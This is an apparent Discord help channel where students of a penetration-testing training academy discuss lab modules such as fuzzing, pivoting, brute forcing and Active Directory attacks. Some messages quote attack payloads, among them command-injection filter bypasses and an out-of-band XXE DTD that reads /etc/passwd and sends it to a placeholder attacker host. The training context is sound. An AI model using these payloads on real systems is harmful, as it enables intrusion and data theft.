#modules

1 messages Β· Page 66 of 1

light fern
#

ensure you have thr web_discovery.xml file

#

which is just a previous scan in the module

rustic sage
#

i dont have it

light fern
#

you doing a module?

rustic sage
#

yes

#

im here

#

if u put ./aquatone --help works

#

why is this happening?

light fern
#

you probably dont have it setup as a binary

#

copy it to /usr/local/bin

#

and see if it works as aquatone

#

should work

#

use the command

#

sudo cp aquatone /usr/local/bin

#

and then type aquatone

#

its not a binary and will run anywhere

rustic sage
#

this works

#

im not understand this

#

can you explain me please?

light fern
primal silo
#

that's a different question I already have flag for that..

#

I need help with this question

rustic sage
#

this works but why i put in /usr/local/bin and why run everywhere

light fern
#

binaries can be run anywhere in the system when executed

#

just how it is

rustic sage
#

and when i tipe aquatone im calling the binary that is in /usr/local/bin?

#

and if the file is doesnt binary this still work?

light fern
#

yes your calling the binary

#

if its not in the bin file you can only run it where its located

#

eg you had to use ./ in the directory it was downloaded

rustic sage
#

i understand

#

this works only with binaries?

light fern
#

not sure

rustic sage
#

Can someone help me with the module Attacking Web Applications with FFUF section VHost fuzzing?
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
I already found two VHosts, but it's not accepting those...

lusty pecan
#

Thank you, So when I generally try only for this subdomain. It creates a job for courses but never really finds anything. ( recursive png). When i try to check within courses, i can find some 403 not found pages when i remove filters, but that's about it. The image one is with filters (img2 png ) . Edited: Now solved

past scaffold
#

Feeling a bit dumb getting stuck so early, but can anyone help with the nmap enumeration medium lab?

#

|| I'm supposed to use --script dns-nsid, from port 53, right?||

past scaffold
#

|| sudo nmap -p139 --script dns-nsid 10.129.250.149 -D RND:9 --source-port=53 -sV --packet-trace -Pn
||

past scaffold
#

Haven't tried the -e tun0/eth0 yet

rustic sage
#

Hello, can someone please help me with the ||Harry Potter|| task in Brute Forcing Logins? I feel like I've followed every advice - username-anarchy for login, CUPP with only first name or first name + last name with 1337, numbers, symbols, set the correct hydra flags, but even after hours of trying, I still can't get the SSH pass

rustic sage
rustic sage
#

not using a good wordlist then πŸ™‚

#

wait just first name? you need the last name

rustic sage
# rustic sage wait just first name? you need the last name

Tried that too, but I read from multiple people you only need the first name (also that's what it says in the hint) so I didn't finish with both first and last name. But I did let it run for about 30mins with no hits as well. As for the logins, I just use the full list from username-anarchy

rustic sage
rustic sage
#

did you let the hydra scan finish? and use the options taught in the module?

rustic sage
fiery robin
#

need helps in command injection model😭

#

stuck on this

#

I tried base64 encode, my payload: "ip=127.0.0.1%0abase64$%09-d%09<<<%09'ZmluZCAvdXNyL3NoYXxlLwAgfCBncmVwIHJvb3QgfCBncmVwIG15c3FsIHwgdGFpbCAtbiAx"

#

and I also tried ip=127.0.0.1%0afi'n'd%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1}$(tr${IFS}'!-~'${IFS}'"-}'<<<'{')gr'e'p%09root, but it didnt work either, I thought may be it's the | problem

fiery robin
knotty quest
#

Keep playing with your base64

rustic sage
#

is to easy

#

execute the first comand only

#

copy the output in textfile and use the next comands whitout restrictions

#

somebody know how i can know the fqdn ?

#

Hi, in Vulnerability Assessment module, when i access to Nessun web interface i cannot access any scan.

#

i cannot access any report

fathom pendant
radiant marten
#

If anyone has done the File Upload Attacks module, I could really use a hint, I'm so close !

fathom pendant
rustic sage
#

i'm accessing to nessun on htb machine in lab

#

because i want to access to pre loaded scan

#

now i can access to previus scan report. i restarted 5 times the box and now i can access

fathom pendant
#

because they should be there

#

I had no issues with this when I ran it

rustic sage
#

yes... nessus had a message about inaccessible api

#

when i clicked on scan to view report

#

but now it works

#

tnx

fathom pendant
#

Ah, yeah usually it's best to wait a few minutes before using services

fiery robin
# knotty quest Keep playing with your base64

idk how to make it executable...it's weird that when I ran $(base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) on my own terminal it throws **find: unknown predicate -n'**. And this has no response from the htbServer. When I user base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=` directly, it return the plain text of decoded string

arctic sentinel
#

Hello! Any hints on why this final step on the Web Server Pivoting with Rpivot is not working??!

#

I have the connection already settled

fathom pendant
#

Check your proxychains config file

fathom pendant
arctic sentinel
#

How do I check the port 9050 is listening? netstat ?!

arctic sentinel
#

It only says: We will configure proxychains to pivot over our local server on 127.0.0.1:9050 on our attack host, which was initially started by the Python server.

#

I checked and have the proxychains.conf correctly

fathom pendant
#

check your proxychains.conf file
cat /etc/proxychains.conf | grep 9050

arctic sentinel
#

It`s already in 127.0.01 9050

#

Ohhh Im going to try something!

knotty quest
hazy grotto
#

can anyone help me with attacking common applications II

acoustic owl
livid quest
#

hey i'm playing around with database entries and curl, does anyone know a prompt do delete a list of entries at once so that just those, which aren't mentioned in the list are left in the database?

past scaffold
#

Is DMing okay?

hasty solar
#

stuck the same as you were can I dm you?

arctic sentinel
#

Hello! I got it but the firefox browser doesn`t open the website 😦

hasty solar
# arctic sentinel

I think u can open firefox without proxychains and then configure the proxy with foxyproxy dont forget to put socks5 tipsfedora

arctic sentinel
#

why socks5?

#

shouldn't be 4?

hasty solar
#

in case of that u used chisel u gotta put socks5

hasty solar
arctic sentinel
#

Finally it worked! started all over again!

#

Thanks!!

dreamy ember
#

Hello all. I am currently struggling with the first question on Password Attacks - Network Services. I used the provided resources for username list and password list. So far I am not getting anything for passwords. Is there a better list out there to try and use?

cedar void
#

I don't know why I am wrong in the python 3 module:

lavish torrent
#

Hi, I'd like to ask you for some help, I've been trying on my own for a long time without any results, am I missing something or is it the wrong way?

round garnet
#

Hi baffon, try running zap hub with google chrome. Its working for me.

past scaffold
#

I figured it out lol

flint chasm
#

Hello all
I need a hint - Footprinting Lab - Easy

#

first flag

arctic sentinel
#

Hello!

#

I've been trying many things but I don't know what's the matter with the cmd command in the Port Forwarding with Windows Netsh

rustic sage
arctic sentinel
#

I have tried like these and with the IP of the rdp session I have... but doesnt work

lavish torrent
arctic sentinel
#

In the notes I don`t know how they manage to get the 42.198 to listen on 8080 if the command says 15.150

#

Maybe the command it's not properly entered... I don't get the same outlook

#

any ideas?!

lost pawn
#

Hello, I have an issue with "appointment". I can ping and nmap the machine. I cannot connect to its ip, however. I want to begin the sql injection. Can anyone provide ideas? Thanks

small steppe
#

Request for Help. Module: Network Enumeration with Nmap - Firewall and IDS/IPS Evasion - Hard Lab.

Ive ran my nmap scans against the target and identified a port with a non-common port number. My problem is that I cant seem to get the service version out of the target. Any assistance would be helpful.

rustic sage
#

some bytes are ||magical||

rustic sage
honest hazel
#

can anyone lend a hand for attacking enterprise networks? I'm at the Active Directory Compromise module, and I'm supposed to add a fake spn and then kerberoast the user.

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation


acmetesting/LEGIT ttimmons 2022-06-01 14:32:18.194423 <never>

[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 10.129.86.167:88 <--socket error or timeout!
[-] Principal: INLANEFREIGHT.LOCAL\ttimmons - [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused

#

it looks like the first 2 packets are correctly going to the dc, but the third one routes to the pivot host and fails

#

i've tried using sshuttle and not proxychains as well

small steppe
flint chasm
#

Hi
Can anyone help me with Footprinting Lab - medium?

#

I downloaded NFS shares but I'm not sure how can I change permission to each ticket. Is it good working path of this quest?

honest hazel
#

right from a domain machine

#

the answer was that I had a dns record for inlanefreight.local that pointed to the host ip rather than the dc. It's always dns.

queen gazelle
# flint chasm I downloaded NFS shares but I'm not sure how can I change permission to each tic...

@flint chasm -- some hints below πŸ™‚

||You can just mount the NFS share with the command found in the cheat sheet. Once you mount it, you will see you don't have access... but which account on your computer might have access to everything? Use that one.

Once you have all the tickets, you will notice that is A LOT to go through to find sensitive information. How might you automate this process? Hint - ChatGPT is your friend πŸ™‚ ||

unreal grail
#

Hi! Have you resolved your issue

#

I have difficulties with that part

hazy grotto
#

Can anyone help me with the SQLmap essentials?

flint chasm
floral coral
#

Hi, can someone give me a hint to skill assessment broken authentication. I got the password to the support.xx and then switched the cookie to admin, but I can't find the admin panel, I have used wfuzz to find directory. So I have no clue as to where the admin panel could be. Thank you for your time have a great day

half inlet
#

How does it want me to submit multiple answers? I found ||#|| subdomains, which are ||not here|| I tried submitting the names separated by spaces, commas, commas with spaces, but it kept saying it was wrong

thorn urchin
half inlet
#

ATTACKING WEB APPLICATIONS WITH FFUF module, Skills Assessment - Web Fuzzing section

rustic sage
#

it should be space separated

half inlet
#

let me try again

#

it worked now

#

ty

rustic sage
half inlet
#

Okay, ty!

#

Is it normal for my FFUF to average 255 req/sec? It seemed like it was much faster in the academy

thorn urchin
#

yeah live internet environment is gunna be more wonky than vpn or pwnbox connection

manic magnet
#

Hey. I am currently doing the Vulnerability Assessment Module and at the OpenVAS Skills Assessment the target box (which should host the OpenVAS Web instance) is not working. Like I can connect to it via ssh fine but no OpenVAS is installed. Can anyone here help me? Am I doing something wrong ? It worked fine when I did the Nessus Skills Assessment

rustic sage
#

I think what you did was correct

#

as far as the eye can see

fathom pendant
manic magnet
#

Yeah

fathom pendant
#

sometimes it's a bit jank

#

so you may need to restart and wait a few minutes before trying

manic magnet
fathom pendant
#

that module takes time so it's more of an oven timer - start the target then read the section

#

by the time you get to target you're good

manic magnet
#

Currently getting this when I try to do <ip>:8080

fathom pendant
#

try https:// instead of http:// or vice versa

#

:)

manic magnet
#

Ah

#

thanks ❀️

fathom pendant
#

it's similar to nessus

#

:D

#

where it doesn't autonegotiate for you

manic magnet
#

Yeah had the same problem with nessus but when I tried both http / https it was probably not loaded by then and after that I didn't think about retrying it with https again

fathom pendant
#

np because for the most part the targets that have been web target either are autonegotiated OR are just http://

unique valve
# arctic sentinel

Keep in mind that the IP addresses you use with that command may differ in the environment when you spawn the target. Feel free to DM me if you are still stuck on that challenge.

broken arch
#

.

light fern
#

@carmine kiln just a query, not sure where to ask this, loving the modules, I notice HTB have a dedicated module to hacking WordPress, are there plans for more dedicated modules for things like hacking Joomla/Drupal etc as dedicated modules? I assume the team are constantly working on new modules which are relevant

rustic sage
#

wordpress got a dedicated module because it has over half the market share for CMS. not saying it’s impossible for dedicated modules for joomla/drupal but I think priorities are elsewhere

light fern
#

Yeah of course, just wanting to see if that's something they consider

raven cairn
light fern
#

As @rustic sage mentioned I guess WP is so large with all the plugins and themes the attack surface is huge needs more module work

sick ravine
#

Hi, I am new in HTB

#

I do easy Linux box, who want to collab with me?

#

Thanks

thorn urchin
sick ravine
#

Thanks man

unreal grail
#

Domain Admin user bross

cinder mortar
#

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

north kite
#

Can someone explain how does this works fadvieb@htb[/htbl$ cat < stdout.tΓ—t

uneven dune
#

hello guys i have a question , where i can report something that i think is bad writing en some module ?

carmine lark
#

I need help for the 'Linux privilege escalation module. 'Cron Job abuse''. I transferred pspy64s on the target via python-server and wget, but when I want to execute pspy there, it says:
.pspy64s: /lib/x867_64-linux-gnu/libc.so.6: version 'GLIB_2.32' not found (required by ./pspy64s)
.pspy64s: /lib/x867_64-linux-gnu/libc.so.6: version 'GLIB_2.34' not found (required by ./pspy64s)

tall saffron
#

there will be a certification with the future redteam path?

autumn pilot
#

try to download an older version of pspy

knotty quest
light fern
#

doing pivoting module, trying to get the msfvenom payload on victim 2 (windows machine) but certutil wont work via download giving me this error, any help?

#

WinHTTP is this referring to internet? or some network capability to download

flint chasm
#

Hello All
I'm trying to end second lab footrprinting - medium
I got the user alex and his password, I got the important.txt also
But how can I log to the mssql?

cinder mortar
#

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

light fern
#

thanks but still same error :S

#

a quick google gives me this reason

#

Error "12029" is a WinHTTP error code that indicates that a socket connection failed because encrypted communication could not be established.

#

something to do with HTTPS and not having a valid certificate

cinder mortar
#

what command are u running on victim 1?

light fern
#

pivoting machine

#

?

cinder mortar
#

ye

light fern
#

no command, I have tried to send the windows payload to the machine and host it to see if that would work ( I thought maybe some internal network block)

#

I thought the victim 2 (windows machine im pivoting too) could download from my attacker

#

considering I have the RDP session and portfwd up

cinder mortar
#

hmm weird

light fern
#

when I go to internet browser on the RDP session it gives me this

#

I thought it looks kind of strange

#

have the configured settings to block this download

#

you have obviously done it?

cinder mortar
#

this is the Meterpreter Tunneling & Port Forwarding section?

light fern
#

yes

cinder mortar
#

i just followed the steps in the module and it worked for me

spiral pelican
#

hi all
i am in the module AD enum and attacks, section Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
i block on the last question: Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
i got the user s*****o and his password but impossible the get a shell. i tryed psexec.py FREIGHTLOGISTICS.LOCAL/sxxxxo@academy-ea-dc03.inlanefreight.local -target-ip 172.16.5.5 -k or evil-winrm but nothing work.
i get a kerberos sessions error with the psexec cmd. please if some one can help me πŸ™‚
Have a great day

light fern
#

actually got it

autumn pilot
spiral pelican
#

yes

#

ea-attack01

autumn pilot
#

and are you sure that this is the correct IP address of the requested target, e.g. DC03

spiral pelican
#

not sure in fact

#

but i dont know how to check

#

the section dont give any info about an ip

autumn pilot
#

crackmapexec, nmap or something else

spiral pelican
#

tks in fact the ip was incorrect; a network scan give me the right one. my last question was a little bit stupid xD

#

thanks dpgg πŸ™‚

north kite
#

Can someone explain how does this works fadvieb@htb[/htbl$ cat < stdout.tΓ—t

cinder mortar
#

i need help for pivoting module skills assesment, i cant seem to get the reverse portfowarding to work via meterpreter on the target m*

devout torrent
#

In Weak Bruteforce Protections ( Module : Broken Authentication ) I am wondering if I am using the correct cvs ( default-password.csv) with the "basic_bruteforce.py" script in the modules. I also added X-Header 127.0.0.1

#

nvm used burp and i realised username and pw does not matter <.<

cinder mortar
cinder mortar
#

i can even see 1234 connected but no idea why its not forwarding to my attack machine

arctic sentinel
#

Hello, I`m stuck with the Port Forwarding with Windows Netsh

#

I assume I have the right setup but I can`t get the final xfreerdp session for user "victor

#

Any ideas?

#

I always get this response after executing the xfreerdp command

rustic sage
#

Doh! I feel so dumb..... Was trying to figure out a username and password after enumeration and tried different techniques.... In the end it was admin/admin 🀦

hearty depot
#

i cant upload screenshots here?

#

anyways

#

im a beginner at python and i have a doubt

#

can it be print(10 * "X") instead of print("X" * 10)?

#

so i figured out the times 10 after a string prints it 10 times

#

what if the times 10 is before the string

lofty grove
hearty depot
#

okei

cedar void
#

Based on the commands you executed, what is likely to be the operating system flavor of this instance? I am stuck on this question. I tried different answers based on typing 'uname -a' but none of my answers worked

rustic sage
#

O.o... Academy.htb down? Bad gateway..

#

And back 🀣

cedar void
#

Can someone DM me about my issue? I have been working on this for a while.

#

nevermind...just fixed it

light fern
# arctic sentinel Any ideas?

You probably have no reverse connection setup /or socat setup (no redirector) you'll need to either setup socat or reverse portfwd

limber cobalt
cedar void
#

IS there a way to copy text from outside the spawn terminal into the spawn terminal machine of the modules

light fern
#

Try ctrl + shift + C and to paste the same but + V

cedar void
#

I fixed it.

#

So when my platinum plan renews do I get an additional 1000 points?

bleak willow
#

Hi, im in the hard lab of password attacks, i got the used d#### & the password in the keepass but doesn't work, any hint please?

vast geyser
#

Hi there, I have a question about OOB XXE,
The modules says, we can create a dtd file as below:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

then the payload as below:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/oob_xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

then we can get the /etc/passwd from the victim server but why?
According the payload, I think we will get /etc/passwd from the attack server not the victim server. Because the victim send a request "http://attack:8000/?content=php://filter/convert.base64-encode/resource=/etc/passwd"
Could any one give me some idea?
thanks!

devout cliff
summer flame
#

hi, did you manage to do it using mimikatz? is it suppose to show cleartext password? no need for hashcat?

vast geyser
devout cliff
# vast geyser I think that the payload get the victim sever /etc/passwd first then put the fi...

basically what you are saying is correct. i would add that it is the .dtd file combined with the payload that enables this OOB XXE. its a lot easier for me personally to understand it when i go through how the victim processes the information in an XXE step by step. so in case you dont understand why the rest of the payload/.dtd file is needed outside of just the php encoding and sending /etc/passwd i would recommend that.

spare condor
#

I want help with** Pivoting, Tunneling, and Port Forwarding** Skills Assessment. I'm trying to download a file from ||PIVOT-SRV01|| to my attack machine. Can I DM someone?

rustic sage
vast geyser
spiral pelican
#

hi all
i am in the module AD enum and attacks, skills Assessement P1
i got the firts clearpassword, pivoting and rdp to the second network 172.16... as sxx_xxx
i found the user txxxx and his password.
but i cant understand how to perform the attack. mimikatz doesnt work on local
and cant get a way to use secretdump in local with a proxychains
If some one can help he it will be very appreciate πŸ™‚
Have a great day

rustic sage
small steppe
#

Request for Help. Module: Footprinting - SMB

Breezed through most of this with no issue and finally hit a wall. Im on the last question -- "What is the full system path of that specific share?" Ive enumerated the target with rpcclient and when I copy/paste the given path, I get an error about path types based on OS. Any assistance would be helpful.

Edit: Solved. Did some googling on OS syntaxes with regard to file directories.

spiral pelican
rustic sage
spiral pelican
#

that exactly what i am doing but i cant get what i missing ^^

rustic sage
#

give me like 30ish minutes if no one else can help by then

spiral pelican
#

sure thank !

sly nebula
#

Module "Abusing HTTP Misconfigurations", Section "Premature Session Population": I think I am replicating the attack exactly as stated in documentation, but it won't work. Could someone look into this please? Thx!

rustic sage
flint agate
#

I need help on Linux Local Privilege Escalation - Skills Assessment second flag sadCat

rustic sage
#

just when I was almost done with Attacking Common Applications, 13 new sections added🫠

arctic crescent
#

can anyone tell me if there's a hint I missed?

rustic sage
arctic crescent
#

if that's the case then that's good to know

rustic sage
#

I don't remember exactly what section it is mentioned in

summer lava
#

Any idea on this, pls ACTIVE DIRECTORY ENUMERATION & ATTACKS -

flint agate
#

can you help me sir ?

spare condor
fierce island
#

I need a nudge with fiinding the WinSCP credentials in module: Credential Hunting in Windows If anyone cares to help πŸ˜„

analog tendon
# cinder mortar bump

I just got done with this module. so what command did you use to set the portforward? using metasploit correct?

cinder mortar
#

yea

#

portfwd add -R -l 8081 -p 1234 -L 10.10.14.108

cinder mortar
#

but idk why metasploit cant catch it

analog tendon
#

did you set the payload?

cinder mortar
#

yes

#

windows/x64/meterpreter/reverse_tcp

analog tendon
#

hold imma dm you

wise slate
#

hi people im stuck with the Password Attacks Lab - Medium
im trying to crack the password for Docs.zip after zip2john the file , but i cat get the job donde with john, so i've tried to use hashcat but i cant find the correct mode for the zip file , i ve tried all the pkzip modes

#

can anyone help me ?

spare condor
rustic sage
rustic sage
wise slate
#

Docs.zip: Zip archive data, at least v2.0 to extract, compression method=deflate

rustic sage
#

please tell me what you're struggling with and if it requires dm we can go there

rustic sage
wise slate
#

ok thanks

onyx rapids
rustic sage
foggy light
#

Module: Pivoting, Tunneling, and Port Forwarding
Skill Assessment FInal Question
How do I get into DC? hints?

#

NVm solved it

dark sentinel
#

Is Academy worth it? I haven’t seen any posts or anything about success stories but I want a general consensus. Im in my 2nd year of schooling for Cybersecurity.

rustic sage
#

success stories for what

rustic sage
#

its a learning platform not a "i got a job" thing

dark sentinel
thorn urchin
#

also cyber security degrees still dont have much respect. The college and uni programs for em arent really refined yet and often focuses on old stuff that isnt updated fast enough

#

so yeah, youre absolutely going to learn more out of the classroom in this field

dark sentinel
thorn urchin
#

Might be a bit late now, but its why I recommend people just go for comp sci degrees with maybe a focus in cybersecurity rather than primarily having a cybersecurity degree. Comp Sci degrees are good and you get more mileage out of it.

#

but having a cybersecurity degree is still going to be useful over having no degree. Just make sure youre supplementing with actually useful information, such as with academy πŸ˜‰

small steppe
#

Request for Help. Module: Footprinting - DNS
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I completed a number of zone transfers and tried running a few different tools/scripts to bruteforce (using various wordlists) both the second-level domain and the subdomains but come up with nothing fruitful. Any assistance would be helpful.

onyx rapids
#

How would someone go about bypassing a filter that removes "<>" from "<?php+echo+'pwned';+?>"

acoustic owl
onyx rapids
dark sentinel
#

@onyx rapids Hey thanks for this, Hopefully there is no shunning for asking dumb questions cause I’m sure I’ll be full of em fingerguns

onyx rapids
#

I've finished everything in the bug bounty module, but don't ask me questions because I don't want to relive the trauma of trying to figure out what the people who made the lab did

acoustic owl
thorn urchin
bleak sierra
#

Hello, I am working on the AD Administration: Guided Lab Part I in the Introduction to Active Directory module. I am trying to rdp into the lab box with xfreerdp, but keep getting the following errors.

bleak sierra
autumn pilot
#

have you given the target like 2-3 minutes after you have spawned it?

bleak sierra
onyx rapids
small steppe
acoustic owl
bleak sierra
velvet plover
#

Hey guys, super new to this and been running through the basics but I seem to be stuck. Im doing "Introduction to Windows Command Line" in the "Skills Assessment" question 8.... I have logged into User7 account, i used ssh to the ip address and have found the module in question but I cant seem to find the flag.... The hint says to look at the members and I have.... Not really sure where to go from here

#

NVM i went wayyyyy too deep in the weeds and wayyyy over thought it

sly nebula
heavy dome
#

Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. I've managed to get access with|| user mike via SSH|| and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore i tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness.
Can i get a hint please?

half inlet
#

Can anyone help me with this module? https://academy.hackthebox.com/module/54/section/511

I got the first two questions correct but the third question is asking me to find a page that says "you dont have access", and I cannot manage to find this page. I am using fuzzing scans which I will paste below but I am not getting any results other than finding ||a /courses folder|| and ||index.php pages||. Here is the command I ran:
||ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://test.academy.htb:30261/FUZZ --recursion -e .php -v||

I also replaced ||test.academy.htb|| with the following and ran the same command:
||academy.htb||
||archive.academy.htb||
||faculty.academy.htb||
But I was not able to get anything. I was getting the index pages returned so I know the command worked, but nothing other than index pages and a ||/course|| folder.

royal sigil
#

hello i have problem to connect to xfreerdp server for module (Packet Inception, Dissecting Network Traffic With Wireshark) i have this when i try to connect (login failed for display 0) any solution thanks .

half inlet
thorn urchin
#

you dont literally replace it with the word PORT

half inlet
#

what do i replace it with?

#

I always have the actual port there but im not finding anything useful

thorn urchin
#

it would indeed be the port of the spawned instance

half inlet
#

Can you think of something else im doing wrong? I cant find any pages other than index

thorn urchin
#

youre ruling out extensions other than just .php

half inlet
#

I did an extension scan and I only got .php .phps and .php7

#

I tried php7 before and got nothing useful'

#

i tried phps and it turns out its just the backend stuff so nothing useful

thorn urchin
#

you sure you got nothing useful

#

sounds like you overlooked some stuff

half inlet
#

Well im asking to some hints on what I overlooked

thorn urchin
#

that's challenging without giving away the answer

#

but if youve checked the things you said you checked then you had the desired result already and dismissed it. So review the stuff you dismissed too early.

half inlet
#

can you atleast give me a subdomain i need to check?

#

if you're talking about the /courses part i set it on recursive so it checks that part too

thorn urchin
#

no, its a skill assessment

crystal widget
fathom pendant
#

Be more descriptive

half inlet
#

not knowing what i did wrong

fathom pendant
#

Reread the modules and keep trying :)

thorn urchin
#

you need to review your results closer

crystal widget
# fathom pendant Be more descriptive

I do not see the button to start the machine, I was told that to answer the question of this module, I should use the machine of the previous module, which is a windows machine, but the vulnerability in question seems not to be relevant for windows, only for linux

half inlet
#

just a waste of time

thorn urchin
#

feel free to dm your fuzz results for each domain

fathom pendant
crystal widget
half inlet
thorn urchin
#

ye I see how that mightve done it

rustic sage
#

can anyone help me with the command injection web skill assessment?

#

I think it passes the filter but im not sure why im not getting any results...

coral cedar
#

@tough fjord I need help , my university domain isn't in HTB valid academic Domian

rustic sage
jaunty vigil
#

anyone do the new thick client stuff

#

and having trouble submitting the uname as the answer?

outer sun
#

anyone there

fathom pendant
rustic sage
fallow geyser
#

Hi can anyone help me with this module? https://academy.hackthebox.com/module/18/section/80

I'm struggling on the third question: " Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "

I have already tried multiple commands several times and still get the error "0curl: (6) Could not resolve host: www.inlanefreight.com"

Just starting out, would appreciate the help!

thorn urchin
fallow geyser
#

okay

#

lemme try that

red current
#

I'm on the Attacking DNS section of Attacking Common Services. The hint says to use subbrute. No matter how I try to run it. I get the same error. zsh: no such file or directory ./subbrute. Has anyone seen that before? I installed it from github just like it says to in the module.

thorn urchin
red current
thorn urchin
#

whats in that directory. ls -la

red current
#

dnslib, .git, LICENSE, names_small.txt, names.txt README.md, resolvers.txt, subbrute.py, windows, windows_setup.py.

#

Does that look right?

thorn urchin
#

looks like you have a subbrute.py file instead of a subbrute bin

#

so either chmod +x and then running ./subbrute.py or call it with python python3 ./subbrute.py

red current
#

@thorn urchin That looks to be working now. Thank you!

thorn urchin
#

np

red current
#

Now, I'm just getting errors when it runs. I'll try it in the pwnbox.

#

Nope, same errors in the pwnbox.

full echo
#

You can refer to password spraying in windows section.

#

Please refer to internal password spraying in windows section

knotty quest
# heavy dome no hit? 😦

Maybe you should be doing some manual checks?? That one is hard to give a hint to without giving away the answer, but sometimes people type stuff in the terminal that they shouldn't.

uneven tree
#

General Mills - Hackathon 2023 access key is what ?

onyx rapids
#

Did you ever finish this? I'm kind of lost. Trying to trigger the basic XSS Alert(1) payload, but it won't work, just displays the code back to me

low mica
#

has anyone here completed the password attacks module?

steady totem
#

Was Attacking Common Applications just updated????

#

I was going to start cpts exam tomorrow, but now I have not completed this module. I really thought I did them all.

#

I am trying to do it now, but the section: Attacking Common Gateway Interface (CGI) Applications - Shellshock is asking me to attack the target... but there is no target to spawn

visual remnant
balmy saffron
#

hello, I am in the DNS sub section of footprinting module 2. I would like to know if, for the last question (FQDN of ...*.203), editing the host file is necessary?

cinder mortar
#

for pivoting module skills assessment is anyone else running into issues with rdp into m* user?

dim cosmos
#

forcing myself to use tmux, i miss the mouse wheel tho kek

acoustic owl
dim cosmos
#

to any future people using pwnbox to do the oracle TNS exercise (the newly added one). you'll get an error when you run sqlplus which is sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory. you fix this by: $export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib/ . you're welcome future ppl...

#

hi @acoustic owl , im a few days off sitting the exam, i've noticed in discussions re offshore that many people used some sort of c2 (covenant mostly). did you use one for the exam?

fathom pendant
#

any discussion about tactics used for the exam afaik are not allowed :)

#

at least definitely not publicly on the HTB discord :^)

acoustic owl
dim cosmos
#

ok awesome

#

am i allowed to ask if you used any command prompt logging for easier reporting? kek

#

ill take not because it wasnt discussed in the academy πŸ˜›

#

im looking forward to having the spare time to do it. failure on first attempt almost assured but i cant wait

acoustic owl
thorn urchin
thorn urchin
#

specifically it covers using tmux for logging

dim cosmos
#

Yes, I've started using tmux for this reason, makes sense

#

I was more asking for personal opinions/experiences

#

Not necessarily in context of exam (I understand this is not allowed)

rustic sage
tidal kelp
#

module ATTACKING COMMON APPLICATIONS section Attacking Thick Client Applications
error when executing RestartOracle-Service.exe. i followed the section

rustic sage
#

good morning

#

im trying to upload a shell in php page and i have a issue

acoustic owl
rustic sage
#

FILE UPLOAD ATTACKS
Page 5
Blacklist Filters
Blacklist Filters

acoustic owl
rustic sage
#

how can i send some burp atacks?

acoustic owl
#

Try it with the Intruder

dim temple
spare condor
#

(other methods doesn't seem to work too)

shadow agate
#

Hey Guys

autumn pilot
#

you are missing a parameter in your command

#

additionally, you must have assured yourself that you can write files in your current working directory

spare condor
autumn pilot
#

up to you to find out

spare condor
# autumn pilot up to you to find out

I tried both .exe and .ps1. None of them are working. Is there some resource to look an example of how to run mimikatz when it's not on the target machine?

autumn pilot
#

the idea is to have it on the machine

#

or to execute it in memory, but thats a different topic

serene dew
placid quest
#

@spare condor Write again mimikatz.exe like wget http://ip address:port/mimikatz.exe mimikatz.exe

spare condor
placid quest
#

@spare condor It works the same

placid quest
#

@spare condor how try to use invoke-webrequest

arctic sentinel
arctic sentinel
#

Hello, I`m looking for some help in the Port Forwarding with Windows Netsh module

#

anyone?!

dim cosmos
#

ask a specific question bro and someone will help eventually

#

i recommend providing information on the module question and what you've tried etc

placid quest
#

@arctic sentinel what is the problem

arctic sentinel
#

I`m taking with HTB staff... I can't open an rdp session on a remote server using the netsh.exe command

#

I have changed several vpn servers... maybe I`m doing something wrong...

dim cosmos
#

is that port right?

#

8080

#

oh i see

arctic sentinel
#

It`s a random port I guess... there is no special mention as in why we should use 8080

placid quest
#

@arctic sentinel Did you check the ip address on the listing address

arctic sentinel
#

with netstat command?

placid quest
#

@arctic sentinel is it skills assessment or

arctic sentinel
#

No, it`s the Port Forwarding with Windows Netsh

placid quest
#

@arctic sentinel You will use the thr ip address that is given

arctic sentinel
#

what ip address? I should rdp to another network using the windows host as pivot no? netsh is telling the host to portforward to 172.16.5.19 no?!

worldly elm
#

Hey guys, I am trying to solve 'Attacking DNS' Lab from the Attacking common services lab

#

and I am stuck at the subbrute part

arctic sentinel
worldly elm
#

I have added the resolver (as per the module's description)

#

but it results in defaulting to the system's resolvers

#

I've added the ns1.inlanefreight.htb resolver only

arctic sentinel
#

You want to discover the zones?!

worldly elm
#

yeah

arctic sentinel
#

I have in my notes that I used the subbrute command...

worldly elm
#

well, I think it's pretty straightforward...

git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1

cd subbrute

